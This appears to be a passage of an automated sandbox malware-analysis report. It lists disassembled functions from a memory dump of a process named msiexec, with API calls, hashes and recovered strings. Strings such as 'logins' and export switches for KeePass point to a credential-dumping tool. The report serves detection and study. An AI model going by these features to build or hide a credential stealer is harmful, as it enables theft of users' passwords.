                                                                                                    • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                    • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                    • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                    • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                    • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                    • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                    • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                    • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                    • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                    • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                      • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                      • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                    • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                    • API String ID: 4054529287-3175352466
                                                                                                    • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                    • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                    • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                    • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                    Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                    • API String ID: 3143752011-1996832678
                                                                                                    • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                    • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                    • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                    • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                    Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                    • API String ID: 1607361635-601624466
                                                                                                    • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                    • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                    • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                    • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                    Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _snwprintf$memset$wcscpy
                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                    • API String ID: 2000436516-3842416460
                                                                                                    • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                    • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                    • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                    • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                    Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                      • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                      • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                      • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                    • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                    • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                    • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                    • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                    • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                    • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                    • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                    • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                    • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 1043902810-0
                                                                                                    • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                    • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                    • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                    • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                    Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                    • _snwprintf.MSVCRT ref: 0044488A
                                                                                                    • wcscpy.MSVCRT ref: 004448B4
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                    • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                    • API String ID: 2899246560-1542517562
                                                                                                    • Opcode ID: df80599c69b4aaf9201dd24796d4ff43ee5aa3dc5a083fdf397899c78ee02472
                                                                                                    • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                    • Opcode Fuzzy Hash: df80599c69b4aaf9201dd24796d4ff43ee5aa3dc5a083fdf397899c78ee02472
                                                                                                    • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                    Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040DBCD
                                                                                                    • memset.MSVCRT ref: 0040DBE9
                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                      • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                      • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                      • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                    • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                    • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                    • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                    • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                                                                    • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                                                                    • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                    • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                    • API String ID: 3330709923-517860148
                                                                                                    • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                    • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                    • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                    • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                    Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                      • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                    • memset.MSVCRT ref: 0040806A
                                                                                                    • memset.MSVCRT ref: 0040807F
                                                                                                    • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                    • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                    • memset.MSVCRT ref: 004081E4
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                      • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                      • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                    • String ID: logins$null
                                                                                                    • API String ID: 2148543256-2163367763
                                                                                                    • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                    • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                    • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                    • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                    Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                    • memset.MSVCRT ref: 004085CF
                                                                                                    • memset.MSVCRT ref: 004085F1
                                                                                                    • memset.MSVCRT ref: 00408606
                                                                                                    • strcmp.MSVCRT ref: 00408645
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                    • memset.MSVCRT ref: 0040870E
                                                                                                    • strcmp.MSVCRT ref: 0040876B
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                    • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                    • String ID: ---
                                                                                                    • API String ID: 3437578500-2854292027
                                                                                                    • Opcode ID: dd6493097ef40e1efd4af62dec432b5c039981901f0df510f1d3cf0aab96b3cc
                                                                                                    • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                    • Opcode Fuzzy Hash: dd6493097ef40e1efd4af62dec432b5c039981901f0df510f1d3cf0aab96b3cc
                                                                                                    • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                    Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0041087D
                                                                                                    • memset.MSVCRT ref: 00410892
                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                    • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                    • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                    • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                    • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                    • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                    • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                    • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 1010922700-0
                                                                                                    • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                    • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                    • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                    • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                    Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                    • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                    • malloc.MSVCRT ref: 004186B7
                                                                                                    • free.MSVCRT ref: 004186C7
                                                                                                    • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                    • free.MSVCRT ref: 004186E0
                                                                                                    • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                    • malloc.MSVCRT ref: 004186FE
                                                                                                    • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                    • free.MSVCRT ref: 00418716
                                                                                                    • free.MSVCRT ref: 0041872A
                                                                                                    • free.MSVCRT ref: 00418749
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$FullNamePath$malloc$Version
                                                                                                    • String ID: |A
                                                                                                    • API String ID: 3356672799-1717621600
                                                                                                    • Opcode ID: 96c66879b4041adad5e36cadfde5f9aa16ffca4bba1cd09b44366f464025a3b3
                                                                                                    • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                    • Opcode Fuzzy Hash: 96c66879b4041adad5e36cadfde5f9aa16ffca4bba1cd09b44366f464025a3b3
                                                                                                    • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                    Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmp
                                                                                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                    • API String ID: 2081463915-1959339147
